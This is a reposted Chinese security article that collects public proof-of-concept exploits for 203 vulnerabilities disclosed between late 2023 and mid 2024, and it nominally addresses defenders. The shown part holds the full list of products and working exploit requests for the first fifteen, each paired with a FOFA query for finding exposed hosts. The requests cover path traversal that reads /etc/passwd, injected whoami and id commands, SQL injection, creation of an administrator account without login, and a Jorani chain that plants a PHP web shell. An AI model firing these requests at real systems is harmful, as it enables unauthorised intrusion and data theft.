互联网公开漏洞整理202309-202406--转载

admin

互联网公开漏洞整理202309-202406
道一安全 2024-06-05 07:41 北京
以下文章来源于网络安全新视界 ，作者网络安全新视界

  T" y! e; Y' e# k; t发文目的：Nday漏洞的利用是安全攻防占比较大的攻击方式，希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。

漏洞来源：文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个，均来自于互联网其他公众号或者网站，由网络安全新视界团队进行整理发布。

  \/ [0 v' n7 }" J( s  s安全补丁：所有的漏洞均为公开漏洞，补丁或漏洞修复方案请联系产品厂家。

文章内容：因受篇幅限制，个别漏洞POC由于过长，统一使用PAYLOAD字样代替，如需完整POC请自行搜索。

& [6 U4 w- N0 Z* ~0 i( m/ Q+ x合法权益：如文章内容侵犯某方合法权益，请后台联系网络安全新视界团队对相关内容进行删除。
/ S( e* P1 @; C0 ~/ q" \4 R2 A6 O8 n
7 V% x6 E$ q4 l1 f, @
声明

6 O$ ~$ f/ s- v$ W) f为简化流程，方便大家翻阅，固不设置“回复再给完整列表”。本文章就是当前最全文章，使用时F12搜索关键词即可。

有需要的可以收藏此文。也可以关注本公众号（网络安全新视界）。
  R3 o) ?3 O" N: R: k9 g
( K7 j" V. M: S5 _5 u
% f& Y- _5 Z2 j# X
5 e3 [6 q1 C- L5 ^! t' S+ Q7 O- C目录
! N/ R7 l' R& o) T; A
01

1. StarRocks MPP数据库未授权访问
7 Z5 v* K" `$ m1 W( c" P2. Casdoor系统static任意文件读取
, f% n# Q* ~0 t% c( t6 o) n9 w: [# u3. EasyCVR智能边缘网关 userlist 信息泄漏
9 Q$ Q2 k: N9 v0 s2 @4. EasyCVR视频管理平台存在任意用户添加
5. NUUO NVR 视频存储管理设备远程命令执行
6. 深信服 NGAF 任意文件读取
7. 鸿运主动安全监控云平台任意文件下载
8. 斐讯 Phicomm 路由器RCE
- ^" Q9 \+ B& `% D9. 稻壳CMS keyword 未授权SQL注入
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
% y7 ]9 v# `$ `1 ]% O11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
12. Jorani < 1.0.2 远程命令执行
13. 红帆iOffice ioFileDown任意文件读取
14. 华夏ERP（jshERP）敏感信息泄露
15. 华夏ERP getAllList信息泄露
16. 红帆HFOffice医微云SQL注入
5 O5 u& E. V  B1 ~. ?, W17. 大华 DSS itcBulletin SQL 注入
: ^) B2 x$ T; N* [' U8 h" \18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
6 M/ N( {' D* i7 t' y; f$ [# X6 k% f19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
20. 大华ICC智能物联综合管理平台任意文件读取
4 L4 g# Q! K: v21. 大华ICC智能物联综合管理平台random远程代码执行
$ u$ n+ e/ C1 H0 _22. 大华ICC智能物联综合管理平台 log4j远程代码执行
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
2 w) J( V, @, M1 p- L" Q, a# a( G24. 用友NC 6.5 accept.jsp任意文件上传
& h  Z' S: p8 X1 Q2 @2 E25. 用友NC registerServlet JNDI 远程代码执行
26. 用友NC linkVoucher SQL注入
/ Q' ~( Z7 T) U; O4 |27. 用友 NC showcontent SQL注入
28. 用友NC grouptemplet 任意文件上传
29. 用友NC down/bill SQL注入
30. 用友NC importPml SQL注入
31. 用友NC runStateServlet SQL注入
1 h2 g$ N  v/ _6 C: H. t32. 用友NC complainbilldetail SQL注入
9 c1 J! P9 T+ U' @33. 用友NC downTax/download SQL注入
34. 用友NC warningDetailInfo接口SQL注入
35. 用友NC-Cloud importhttpscer任意文件上传
36. 用友NC-Cloud soapFormat XXE
" q& a; v3 O  O. B. q! h9 |! s37. 用友NC-Cloud IUpdateService XXE
9 u& [  x! N5 ~* W* I! \38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL注入
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
  |  f2 Y  K3 a6 t42. 用友GRP-U8 SmartUpload01 文件上传
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
; ?6 g7 `: B/ D" M: j- y0 B7 A, {6 }44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: ?9 z9 N$ p& D6 m4 J. R7 n45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
47. 用友GRP A++Cloud 政府财务云 任意文件读取
48. 用友U8 CRM swfupload 任意文件上传
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
' F3 j9 B) g3 i$ o1 S/ m' e; g50. QDocs Smart School 6.4.1 filterRecords SQL注入
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
52. 泛微E-Office json_common.php sql注入
3 V3 a% L0 W! _. Z53. 迪普 DPTech VPN Service 任意文件上传
6 C; X9 ~2 U. m# g54. 畅捷通T+ getstorewarehousebystore 远程代码执行
" H4 W) f! t" B% U0 C. `$ X55. 畅捷通T+ getdecallusers信息泄露
; X+ L% z2 q% G; P" j) b/ z5 r. X4 G56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
& v. ?. ]/ L# N57. 畅捷通T+ keyEdit.aspx SQL注入
& w2 o1 A8 F0 G: U2 v7 Y$ ^# ]58. 畅捷通T+ KeyInfoList.aspx sql注入
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
60. 百卓Smart管理平台 importexport.php SQL注入
# d. `  [$ i5 o0 O. p* B" p9 E6 X61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
7 ]. J0 Z- g3 s( K7 m62. IP-guard WebServer 远程命令执行
63. IP-guard WebServer任意文件读取
3 }% y. f, ?. q3 V. T" `64. 捷诚管理信息系统CWSFinanceCommon SQL注入
. g3 j+ h9 t" U- c) u9 [0 b6 V65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
67. 万户ezOFFICE wpsservlet任意文件上传
0 K6 l$ W8 {$ C68. 万户ezOFFICE wf_printnum.jsp SQL注入
69. 万户 ezOFFICE contract_gd.jsp SQL注入
0 h! U3 m' ^/ o70. 万户ezEIP success 命令执行
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
6 U% j. B4 w! s6 o1 a9 j7 y72. 致远OA getAjaxDataServlet XXE
( p: `" }; A" I$ Y8 h3 K73. GeoServer wms远程代码执行
74. 致远M3-server 6_1sp1 反序列化RCE
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
76. 新开普掌上校园服务管理平台service.action远程命令执行
$ A4 Z, r9 s" D$ b77. F22服装管理软件系统UploadHandler.ashx任意文件上传
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# E# l- l7 c/ |- |5 z79. BYTEVALUE 百为流控路由器远程命令执行
9 N. j* `( Z) Z. o' n80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
& `1 [, Y+ A+ C6 d81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
1 l( i3 I) t1 D4 |83. JeecgBoot testConnection 远程命令执行
  Q  Q% e* s' _84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
85. SysAid On-premise< 23.3.36远程代码执行
. _# g$ G/ N/ \6 c( g86. 日本tosei自助洗衣机RCE
. H1 B" R  s5 f7 A87. 安恒明御安全网关aaa_local_web_preview文件上传
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
: M. r5 s1 u; t7 v* z89. 致远互联FE协作办公平台editflow_manager存在sql注入
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
3 q2 n! ]4 S% J7 V4 H7 K: M91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
92. 海康威视运行管理中心session命令执行
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
96. Apache OFBiz  18.12.11 groovy 远程代码执行
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
/ i& T+ l1 k/ L" V. u98. SpiderFlow爬虫平台远程命令执行
99. Ncast盈可视高清智能录播系统busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
6 g* n, k+ O! O& b) {& W! K101. ivanti policy secure-22.6命令注入
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
* W0 e7 E+ r2 w1 l1 f3 ]0 N$ ^* S0 M105. SpringBlade v3.2.0 export-user SQL 注入
+ R  ?6 p+ v4 x, z& k, Y; L7 H106. SpringBlade dict-biz/list SQL 注入
107. SpringBlade tenant/list SQL 注入
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI 任意文件读取
3 l# c" [2 S' w" q110. Goanywhere MFT 未授权创建管理员
111. WordPress Plugin HTML5 Video Player SQL注入
112. WordPress Plugin NotificationX SQL 注入
( \* R9 O8 u) S: i113. WordPress Automatic 插件任意文件下载和SSRF
114. WordPress MasterStudy LMS插件 SQL注入
115. WordPress Bricks Builder <= 1.9.6 RCE
" E7 {9 F  X8 |116. wordpress js-support-ticket文件上传
, a7 Q/ X! r% W" f117. WordPress LayerSlider插件SQL注入
+ S: d: R6 y  Y/ i) v118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
: l- T: h, j4 a# c119. 北京百绰智能S20后台sysmanageajax.php sql注入
5 ~5 o3 }2 _( z/ {120. 北京百绰智能S40管理平台导入web.php任意文件上传
, ~5 |# l/ q) n& Z1 ?' u* o121. 北京百绰智能S42管理平台userattestation.php任意文件上传
# j  N9 V6 \& P2 r3 J9 b122. 北京百绰智能s200管理平台/importexport.php sql注入
123. Atlassian Confluence 模板注入代码执行
124. 湖南建研工程质量检测系统任意文件上传
125. ConnectWise ScreenConnect身份验证绕过
126. Aiohttp 路径遍历
127. 广联达Linkworks DataExchange.ashx XXE
& T" ~+ g8 ^7 J128. Adobe ColdFusion 反序列化
* a9 d4 u& H! }' E/ l129. Adobe ColdFusion 任意文件读取
( _( Y. w' c. L- F130. Laykefu客服系统任意文件上传
3 O* Y) s4 U" q8 `131. Mini-Tmall <=20231017 SQL注入
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
! I' l0 t- `# x  c& y! r133. H5 云商城 file.php 文件上传
7 S8 R* B: k; Z8 W5 X; z0 z- Z7 y0 J134. 网康NS-ASG应用安全网关index.php sql注入
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
136. NextChat cors SSRF
" i0 v& _5 ~5 Q" M0 |137. 福建科立迅通信指挥调度平台down_file.php sql注入
2 C% o! B% V% k( ?138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
  j1 {2 L* U0 C$ n0 X139. 福建科立讯通信指挥调度平台editemedia.php sql注入
& ]' ~$ d4 ?4 C0 |& Z140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
% N& Q# `+ k0 U4 c6 X141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
142. CMSV6车辆监控平台系统中存在弱密码
0 t* G- w+ y) x$ J143. Netis WF2780 v2.1.40144 远程命令执行
! K7 P& m( I- M7 K144. D-Link nas_sharing.cgi 命令注入
2 q/ P5 u+ K" [: \2 v$ p3 J7 }2 ~145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
146. MajorDoMo thumb.php 未授权远程代码执行
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
$ c8 K3 [5 }# R: J148. CrushFTP 认证绕过模板注入
149. AJ-Report开源数据大屏存在远程命令执行
# P8 L  d/ j2 z8 m150. AJ-Report 1.4.0 认证绕过与远程代码执行
151. AJ-Report 1.4.1 pageList sql注入
' D$ A8 R0 J3 F9 v152. Progress Kemp LoadMaster 远程命令执行
3 C! N2 I6 F) g# ^153. gradio任意文件读取
# I$ e( \$ D& _# G4 P154. 天维尔消防救援作战调度平台 SQL注入
155. 六零导航页 file.php 任意文件上传
! M0 z1 ~! K+ A156. TBK DVR-4104/DVR-4216 操作系统命令注入
. k8 j2 d; }6 c& s3 P1 ^8 G157. 美特CRM upload.jsp 任意文件上传
5 a+ C8 m2 U& f$ c158. Mura-CMS-processAsyncObject存在SQL注入
( R* @$ l2 o5 x159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
160. Sonatype Nexus Repository 3目录遍历与文件读取
0 i) E/ N$ r3 E6 {7 P, H4 a6 x2 N161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
% p) j" f, D3 C$ W% Y7 `163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
2 p# C0 @6 ]  F, Y164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
6 A1 `" j1 j- l3 c- ?. j165. OrangeHRM 3.3.3 SQL 注入
6 L+ g: a9 A- f( r4 C* v9 i166. 中成科信票务管理平台SeatMapHandler SQL注入
# y, X! P- b! s4 E: ]1 N6 \' `2 t  D167. 精益价值管理系统 DownLoad.aspx任意文件读取
  s# {3 Q2 |5 d+ G- T% U5 T4 [168. 宏景EHR OutputCode 任意文件读取
169. 宏景EHR downlawbase SQL注入
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
9 ?7 ]; n+ H* _9 Q171. 通天星CMSV6车载定位监控平台 SQL注入
172. DT-高清车牌识别摄像机任意文件读取
173. Check Point 安全网关任意文件读取
6 s" G& T: l) B* D& r: J: s* G174. 金和OA C6 FileDownLoad.aspx 任意文件读取
0 Q5 A: `: C5 c8 j% F  J175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
176. 电信网关配置管理系统 rewrite.php 文件上传
: t/ p& h- |7 m" O177. H3C路由器敏感信息泄露
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
( E. x. x' F0 G4 O( x8 ]! T179. 建文工程管理系统存在任意文件读取
180. 帮管客 CRM jiliyu SQL注入
* P0 ]& {7 S5 I. l6 p181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; I% a% n9 m5 N- Z. x) k182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
( a3 [1 h  _, d  R, c183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
8 t; _8 j% F+ X' ]& h& S184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
, Q2 s, e/ Q4 d7 n3 o  C9 `185. 瑞友天翼应用虚拟化系统SQL注入
186. F-logic DataCube3 SQL注入
  u/ r% y4 {8 [. B0 r7 P4 A" b187. Mura CMS processAsyncObject SQL注入
! g2 P7 u) w8 Q, K0 h1 q- X188. 叁体-佳会视频会议 attachment 任意文件读取
1 ?0 q) |  {) @7 Q, X) W+ y189. 蓝网科技临床浏览系统 deleteStudy SQL注入
& m5 F. M8 m1 a190. 短视频矩阵营销系统 poihuoqu 任意文件读取
; K9 ]1 e1 y3 O3 S2 ~# ]: |191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
# G* Z" E+ C# Z. ~6 d192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
5 K' O* k! q2 c: H193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
2 W8 m$ R, B2 [* Y7 g195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
5 l5 N" S5 s1 E3 `# d196. 河南省风速科技统一认证平台密码重置
6 A/ h% V# d1 z4 r6 {' J197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
198.  阿里云盘 WebDAV 命令注入
$ V, V& a$ a1 Q7 e# U199. cockpit系统assetsmanager_upload接口 文件上传
4 f/ o; V# Y& W200. SeaCMS海洋影视管理系统dmku SQL注入
! f2 u' `, Y, V* N0 v/ h201. 方正全媒体新闻采编系统 binary SQL注入
202. 微擎系统 AccountEdit任意文件上传
" P9 ]$ J( b' C2 Y  u203. 红海云EHR PtFjk 文件上传

; R+ E% H6 H4 X3 [6 Z6 _POC列表
8 _( b9 M& U; C" L
  A0 n  e! V+ X* a02

1. StarRocks MPP数据库未授权访问
0 c$ `- N8 F" Q/ O# j2 G9 FFOFA ：title="StarRocks"
/ R+ M* ^% d+ m3 MGET /mem_tracker HTTP/1.1
Host: URL
. x+ l5 I: I1 p

' l3 f1 W- `. H; v2. Casdoor系统static任意文件读取
FOFA ：title="Casdoor"
1 d' |7 F6 M3 x3 I% G& MGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& K7 p7 s& P0 T" J1 sConnection: close
5 D# I/ k; c) R4 hAccept: */*
0 d7 Y# ^; y9 d, DAccept-Language: en
Accept-Encoding: gzip
/ P; e9 f7 }  v; e& h4 P

5 @# |8 Q2 n% }3. EasyCVR智能边缘网关 userlist 信息泄漏
FOFA ：title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

' M5 H& e3 l+ F+ I3 d0 o# k& x, O
4. EasyCVR视频管理平台存在任意用户添加
. f8 I8 h0 M2 UFOFA ：title="EasyCVR"
  _  [, Y0 ^0 X( i+ A$ A1 y
6 a7 r4 Q# M3 Z& s8 Y! fpassword更改为自己的密码md5
POST /api/v1/adduser HTTP/1.1
4 p; Y# W# |" LHost: your-ip
+ M, ]2 R6 t: J2 i1 E: KContent-Type: application/x-www-form-urlencoded; charset=UTF-8
8 H! o- d6 R% m, G  {
6 l' w/ I1 E- Q! ]name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


. f6 s# w: |- x6 p" W5. NUUO NVR 视频存储管理设备远程命令执行
FOFA：title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
8 b8 {- ^& a1 d) `Host: xx.xx.xx.xx
/ Y* t" u$ G7 j4 O0 t- s0 a8 D

6. 深信服 NGAF 任意文件读取
' n. Z+ \0 S, x3 X) tFOFA：title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
" ~* c! l; E/ o9 a7 J# Q( Q4 QHost:

' Y' k/ ?0 ~- ^+ F' Q/ g7 ~; x
7 a. _) B7 f7 z5 F; k7. 鸿运主动安全监控云平台任意文件下载
FOFA：body="./open/webApi.html"
9 q$ g1 B. R, P5 p9 G8 LGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
- n  C. \% x' F: v, v/ x! g6 mHost:
# U5 B7 X' s# Q" X$ O. n+ X( J& r
5 L: _; C" J$ z3 R5 T" B) V
8. 斐讯 Phicomm 路由器RCE
2 k$ o6 P4 k6 X% m0 {, g4 FFOFA：icon_hash="-1344736688"
默认账号admin登录后台后，执行操作
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
. r, j  G% I; k; w4 T1 fUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
& g; s7 D5 z' P
) [* I1 S* F5 \: }$ z------WebKitFormBoundaryxbgjoytz
4 @& |! U: o4 l9 P! E4 fContent-Disposition: form-data; name="wifiRebootEnablestatus"
) ~' N# I; S) R* {* O( H6 H
%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"
% X$ w  Z9 A2 V. i. L% }) A- Q3 b
12:00; id;
------WebKitFormBoundaryxbgjoytz
- [1 y% `. M+ [( W) o8 DContent-Disposition: form-data; name="wifiRebootendrange"
; O, S% P' D9 U0 b
. Z! W6 M1 k: a/ Y* S5 E- O%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"
3 U# v7 J# _' z' M
- P2 [; i1 @$ L$ G5 O
1 l3 _5 M  J7 p  }------WebKitFormBoundaryxbgjoytz--
/ U6 F$ n' x& H' u* D' d  O0 G

9. 稻壳CMS keyword 未授权SQL注入
FOFA：app="Doccms"
+ I, m) S4 i% w& E; o7 g' xGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

! C2 j8 g1 L" L/ v! ]* ]9 V" o+ M: E
payload为下列语句的二次Url编码
) _5 ^( C* w: D' |& r& J
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
/ V9 ~, J9 l+ }* O: U* k) H
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
: P( B: H6 Q' x2 k2 f- ^7 ]" S& mFOFA：icon_hash="953405444"
- ?$ a  y% ?' t: F
文件上传后响应中包含上传文件的路径
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
' H5 i! Z0 H8 Q. ?* @7 yContent-Length: 197
, u( k% @% J2 d' s! m1 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
+ c+ `8 M+ B- u' w$ L
4 r$ g  `" D! K) p0 Q8 g% {------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
$ a( Q8 m- C1 P, A7 g: YContent-Type: text/html
( z6 e2 Z3 _7 j4 T
jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
: u' b$ f7 @' @. r( \& \FOFA：icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
  \  K$ S) O8 Z* g) lPragma: no-cache
/ v# F' [# q! hCache-Control: no-cache
Upgrade-Insecure-Requests: 1
0 e) u1 E3 j, JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
( `7 P$ j$ \4 p1 v, f

12. Jorani < 1.0.2 远程命令执行
FOFA：title="Jorani"
& |9 o9 P; @3 ?% I1 n8 X6 O. y  O& {第一步先拿到cookie
2 a: l& o" O6 gGET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
$ ?: _0 f- C% L! L5 {5 \! OAccept-Encoding: gzip
2 Y7 |4 O) Y2 b8 t$ a' g9 m( ]
. u: z/ H9 l0 M% l5 y' r% ], N
$ B3 |% i5 ~; O) y! d% ~2 b6 t响应中csrf_cookie_jorani用于后续请求
7 I$ }( [# J; YHTTP/1.1 200 OK
Connection: close
4 }4 {0 o/ ~, u* q- E1 uCache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
# P$ a; s- U! l8 e3 fExpires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
; s$ W: Y( b9 t1 I& yPragma: no-cache
4 Z0 D9 @$ ?% r* }Server: Apache/2.4.54 (Debian)
/ s  Y3 d) w( K4 z  Z) lSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding
9 H5 f$ f! j" Z1 p

1 z: G7 ^/ w$ e3 @& o! E& H6 CPOST请求，执行函数并进行base64编码
POST /session/login HTTP/1.1
; e9 G4 w9 B6 b6 {% N5 K& v, u/ YHost: 192.168.190.30
+ R6 j# K; g5 {. b  U5 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
- j7 ]; K5 a4 w  o2 C0 nConnection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
% V. d8 z) W  b8 ^8 |. T
/ {3 H8 T( W1 ^1 S0 y3 G
3 H1 y' }$ ^! }, r3 y  _) }, U
2 f( r6 g% [1 _% {0 I. X; q向靶场发送如下请求，执行id命令，请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
1 q/ ^) q# ?) x7 [. e; e) L2 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
/ Z# x( y. h! U0 F- t8 UAccept-Encoding: gzip

* _0 @& k3 y: z9 G! c- f
13. 红帆iOffice ioFileDown任意文件读取
  a) v: Y" r! ^0 t1 ^: U' ~FOFA：app="红帆-ioffice"
% q7 G8 A" m% o6 N/ u+ EGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
" ~# `6 i$ k8 P/ H0 [7 R; Z; SUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
: L& C5 b9 ^9 S# L, ^+ T# OConnection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP（jshERP）敏感信息泄露
9 [; x) g% G+ N9 ]1 E4 }2 ^1 V8 p8 YFOFA：body="jshERP-boot"
泄露内容包括用户名密码
8 V4 t" p) G3 ~GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
7 \# u1 d1 z2 \( H+ B) q0 H- TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) l8 z0 u5 ]2 |0 O3 sConnection: close
Accept: */*
Accept-Language: en
" Z! v" F% u- Y% w7 Z: MAccept-Encoding: gzip
* u0 F, p: K' o9 D0 p4 \, ]
5 r1 _# L7 Q$ r0 o8 {# s" R
15. 华夏ERP getAllList信息泄露
4 m9 r$ c! D) q7 RCVE-2024-0490
9 C0 t+ x) n5 k- bFOFA：body="jshERP-boot"
0 `/ K* y5 j5 s+ L- J( d" x4 D' K泄露内容包括用户名密码
; i3 r. C8 M  W7 z  Y# @$ lGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
3 e4 B" y! }: }7 l! |% cHost: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
. g7 h. l1 V- i* b3 H3 j% b, M$ M9 lConnection: close
) `2 d3 q# S6 o. x! B3 Y) d; OAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
